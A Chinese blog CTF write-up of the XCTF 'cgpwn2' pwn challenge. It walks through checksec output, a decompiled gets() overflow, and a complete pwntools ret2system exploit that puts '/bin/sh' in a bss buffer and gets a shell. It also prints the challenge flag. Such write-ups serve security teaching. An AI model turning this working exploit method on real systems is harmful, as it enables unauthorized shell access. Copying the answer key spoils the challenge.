欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

cgpwn2 [XCTF-PWN]CTF writeup系列10

程序员文章站 2022-05-15 22:40:02
...

题目地址:cgpwn2

先看看题目内容:

cgpwn2 [XCTF-PWN]CTF writeup系列10

照例检查一下保护机制

aaa@qq.com:/ctf/work/python# checksec 330890cb0975439295262dd46dac13b9 
[*] '/ctf/work/python/330890cb0975439295262dd46dac13b9'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

只有NX打开了,那就应该可以执行栈溢出,打开IDA看下

cgpwn2 [XCTF-PWN]CTF writeup系列10

 我们可以看到三个重要的函数:main、hello、pwn,反编译成c语言如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  hello();
  puts("thank you");
  return 0;
}

char *hello()
{
  char *v0; // eax
  signed int v1; // ebx
  unsigned int v2; // ecx
  char *v3; // eax
  char s; // [esp+12h] [ebp-26h]
  int v6; // [esp+14h] [ebp-24h]

  v0 = &s;
  v1 = 30;
  if ( (unsigned int)&s & 2 )
  {
    *(_WORD *)&s = 0;
    v0 = (char *)&v6;
    v1 = 28;
  }
  v2 = 0;
  do
  {
    *(_DWORD *)&v0[v2] = 0;
    v2 += 4;
  }
  while ( v2 < (v1 & 0xFFFFFFFC) );
  v3 = &v0[v2];
  if ( v1 & 2 )
  {
    *(_WORD *)v3 = 0;
    v3 += 2;
  }
  if ( v1 & 1 )
    *v3 = 0;
  puts("please tell me your name");
  fgets(name, 50, stdin);
  puts("hello,you can leave some message here:");
  return gets(&s);
}

int pwn()
{
  return system("echo hehehe");
}

注意到hello里面一堆乱七八糟的代码,都没用。只有最后4行是关键:

  puts("please tell me your name");
  fgets(name, 50, stdin);
  puts("hello,you can leave some message here:");
  return gets(&s);

测试一下两个点都可以溢出,应该不需要两个溢出点

aaa@qq.com:/ctf/work/python# ./330890cb0975439295262dd46dac13b9 
please tell me your name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
hello,you can leave some message here:
Segmentation fault
aaa@qq.com:/ctf/work/python# ./330890cb0975439295262dd46dac13b9 
please tell me your name
aa
hello,you can leave some message here:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

检查一下栈溢出的三个要素,溢出点有了,pwn函数中找到了sytem,还差/bin/sh。全局查找了一下没有发现/bin/sh,在看下变量name是在bss段中,全局变量。那就可以直接把/bin/sh传给name。system和name的地址如下:

.plt:08048420 ; int system(const char *command)
.plt:08048420 _system         proc near               ; CODE XREF: pwn+D↓p
.plt:08048420
.plt:08048420 command         = dword ptr  4
.plt:08048420
.plt:08048420                 jmp     ds:off_804A01C
.plt:08048420 _system         endp


.bss:0804A080                 public name
.bss:0804A080 ; char name[52]
.bss:0804A080 name            db 34h dup(?)           ; DATA XREF: hello+77↑o
.bss:0804A080 _bss            ends

好了,三个要素都已经搞定,构造一下payload

system_addr = 0x08048420
binsh_addr = 0x0804A080
payload = 'A'*0x26 + 'A'*4 + p32(system_addr) + 'A'*4 + p32(binsh_addr)

栈溢出已经说了好多次了,就不再赘述了。根据payload编写python脚本如下:

#!python
#!/usr/bin/env python
# coding=utf-8

from pwn import *
# context.log_level = 'debug'
p = process('./330890cb0975439295262dd46dac13b9')
# p = remote("111.198.29.45", 57351)

system_addr = 0x08048420
binsh_addr = 0x0804A080
payload = 'A'*0x26 + 'A'*4 + p32(system_addr) + 'A'*4 + p32(binsh_addr)

p.sendlineafter('please tell me your name', '/bin/sh')
p.sendlineafter('you can leave some message here:', payload)
p.interactive()

具体执行结果如下:

aaa@qq.com:/ctf/work/python# python cgpwn2.py
[+] Starting local process './330890cb0975439295262dd46dac13b9': pid 197
[*] Switching to interactive mode

$ id
uid=0(root) gid=0(root) groups=0(root)
$  

执行成功,修改python脚本连接服务器:

aaa@qq.com:/ctf/work/python# python cgpwn2.py
[+] Opening connection to 111.198.29.45 on port 57351: Done
[*] Switching to interactive mode

$ cat flag
cyberpeace{8a707891cac7e8c2b05dd9ea2d76df86}
$  

执行成功,这个题目考的知识点是如何用bss段变量构造/bin/sh。

相关标签: CTF XCTF-PWN